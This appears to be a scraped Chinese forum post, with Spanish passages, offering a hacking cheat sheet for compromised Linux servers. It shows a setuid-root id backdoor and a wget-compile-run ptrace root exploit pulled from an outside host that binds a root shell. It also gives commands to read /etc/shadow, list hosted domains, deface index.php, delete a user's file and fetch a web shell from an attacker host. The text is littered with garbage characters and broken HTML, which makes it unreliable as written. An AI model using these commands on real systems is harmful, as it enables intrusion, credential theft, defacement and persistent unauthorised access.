- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0

我的地盘我做主
该用户从未签到
 |
< ><FONT color=#ff0000>by:cnbird</FONT></P>6 N% G0 T+ t3 E8 \* m
< >1.</P>
7 z6 n1 U: c& C4 }< >[cnbird@localhost tmp]#id</P>
2 o4 e3 Q0 n' c: e5 g< >uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk)</P>& s# L% Q6 }; o, g; A
< >[cnbird@localhost tmp]#cp `which id ` .</P>7 H7 [* {; T/ K5 n9 [* |5 i+ U8 S
< >[cnbird@localhost tmp]#chown root ./id</P>0 |7 C2 s( ?5 Y9 u5 @- z2 o( ^1 f2 @
< >[cnbird@localhost tmp]#chmod 755 ./id ; chmod u+s ./id</P>
/ }5 x4 ]; A$ G Y% c< >[cnbird@localhost tmp]#ls -l ./id</P>
3 t, m3 J1 a# R( ]4 T< >-rwsr-xr-x 1 root root 9264 Mar 8 21:36 ./id*</P>
' c! z2 d b" _0 M+ v) g< >[cnbird@localhost tmp]#exit</P>
$ Z2 v% G. Q* H< >[cnbird@localhost tmp]$id</P>
1 @; `( D a% [/ o: F7 [0 R4 }< >uid=500(cnbird) gid=500(cnbird) groups=500(cnbird)</P>' g& u, E0 U r* H7 i- I D
< >[cnbird@localhost tmp]$./id </P>% O* j% k5 {: K+ D4 ~& s6 [! i
< >uid=500(cnbird) gid=500(cnbird) euid=0(root) groups=500(cnbird)</P>
5 [4 l0 i, x" ~0 j! ~< >2.利用ptrace成为root的方法</P>2 N% v3 w6 F3 n" v
< >[bash]# cd /tmp/; wget <a href="http://delivered.informaticahispana.org/ptrace.c" target="_blank" ><FONT color=#0000ff>http://delivered.informaticahispana.org/ptrace.c</FONT></A>; gcc ptrace.c -o ptrace; chmod -c 777 ptrace; ./ptrace; N$ x& F) i) P
-> Parent's PID is 2313. Child's PID is 2314.
# @0 P& d' \% _4 S4 n-> Attaching to 2315...) e( p. N( a: B1 W- G2 n
-> Got the thread!!; [ L, y% k" g4 T1 |5 u; C: B2 G
-> Waiting for the next signal...
4 |1 ^0 {* ^6 q+ O+ ]7 x-> Injecting shellcode at 0x4000e85d
5 N5 i( c% D* `( v-> Bind root shell on port 24876... =p
: a8 \7 C9 t, y-> Detached from modprobe thread.( t2 q! q5 F& g( u. g1 m6 r/ @
-> Committing suicide.....</P>7 h8 t, q3 F6 Z8 L; U7 Q) C `
< >[bash]# id
! p) v3 j- R }2 U6 b2 ?uid=0(root) gid=0(root) groups=0(root)</P>
* y* S7 b' D3 I' a0 U3 R" m< > ara ver los dominios que hay en el server:" i& s0 r; K' W" j: D9 C+ L! a
---------------------------------------------------------
) t) o6 T3 D" J# }9 |" A) N3 icat /etc/httpd/conf/httpd.conf|grep ServerName << Solo salen los dominios
. s" b2 v( \8 h7 Z {' w7 |) @cat /etc/httpd/conf/httpd.conf << Unicamente los puros dominios- {" {# p: E( r, S: G% u1 u
cat /etc/localdomains << Unicamente los dominios locales) r; c6 R X8 ^( q8 f
cat /etc/trueuserdomains << Revela los verdades propietarios de cada dominio , z% s6 N; R* n: C
cat /etc/userdomains << Este es el mas comun
, e1 G2 _: y6 i2 ?0 Y: R---------------------------------------------------------</P>
; @$ T, n% [8 L' v< > ara ver la version de kernel: p1 L+ g, ]' U, d- a5 U
---------------------------------------------------------; a9 |) l+ D) p/ M
uname -a <<Te sale algo asi Linux itys.host4u.net 2.4.20....., 2.4.20 viene siendo la version del kernel.. A5 l6 S% ~2 A. }) H3 {
---------------------------------------------------------</P>$ |; V; {$ _; M7 n ~4 S1 b3 J7 l
< > ara modificar un index ya existente:3 y3 N( c/ j/ [
---------------------------------------------------------' s+ K/ x! e5 Q% U5 N6 u( I) H- c
echo "RootBox was OwNz You">index.php <<sobreescribe el archivo index.php con nuevo contenido
; `+ P3 I) M# s: g2 j---------------------------------------------------------</P> l0 s- [ D9 N
< > ara subir, compilar, darle permisos de ejecucion y ejecutar un exploit:
! g- ?# r6 S1 L5 h& K+ g3 k$ b---------------------------------------------------------
" @ N3 i" i: i7 f# V9 j( d) wcd /tmp/;wget <a href="http://web<a%20href=/" target="_blank" >_</A>atacante/exploit.c"><FONT color=#0000ff>http://web<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>atacante/exploit.c</FONT></A> <<aqui subimos el exploit
) @0 M4 ^6 N1 C# N- pcd /tmp/;cc exploit.c -o exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui lo compilamos con el nombre de "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado"
8 `. ~- [( _. p- d/ ]0 A" F' fcd /tmp/;chmod -c 777 exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui le damos permisos de ejecucion a "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado"2 }3 {; x4 Z/ N2 L; V; h! Z1 {
cd /tmp/;./exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui estamos ejecutando a "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado".
, T* S R6 y4 Y8 d g k. Q1 |Hasta aqui termina el proceso para un exploit.
7 t u1 i1 n5 E6 j+ M# H---------------------------------------------------------</P>: A. Q$ D! p$ }0 Q7 U
< >Ver las contraseñas encriptadas de todos los usuarios:
- F# C8 s+ o. \0 S7 K---------------------------------------------------------
8 Q A' g7 Q5 xcat /etc/shadow <<Solo funciona si tienes permisos como root.. {0 P3 \9 c* \& H; }0 ]
---------------------------------------------------------</P>5 d' Q, d- X. g: N" @. T
< >Borrar un Ficher$ A( @7 V6 U) t! W) q* K
---------------------------------------------------------
$ q6 O& \& o' Z, C* Pcd /home/juan/public<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>html/;rm import.htm<<aqui estan borrando con el comando rm, el fichero import.htm
# d; L8 r1 `2 x+ z( l0 @4 E% B: _---------------------------------------------------------</P>
! r3 `6 l/ S( }+ s! m: u< >Subir un ficher
5 L1 E7 I8 P! k' c- S---------------------------------------------------------
3 S% _$ X' w- u" Y- K& v7 e3 zcd /home/juan/public<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>html/;wget <a href="http://web<a%20href=/" target="_blank" >_</A>atacante/shell.php<<ESTAMOS"><FONT color=#0000ff>http://web<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>atacante/shell.php<<Estamos</FONT></A> subiendo el fichero shell.php</P>
, b3 \: [5 I$ t6 h* ]) s4 f/ |< >
% I6 w# Z% G$ z. ?' S<CENTER></CENTER> |
zan
|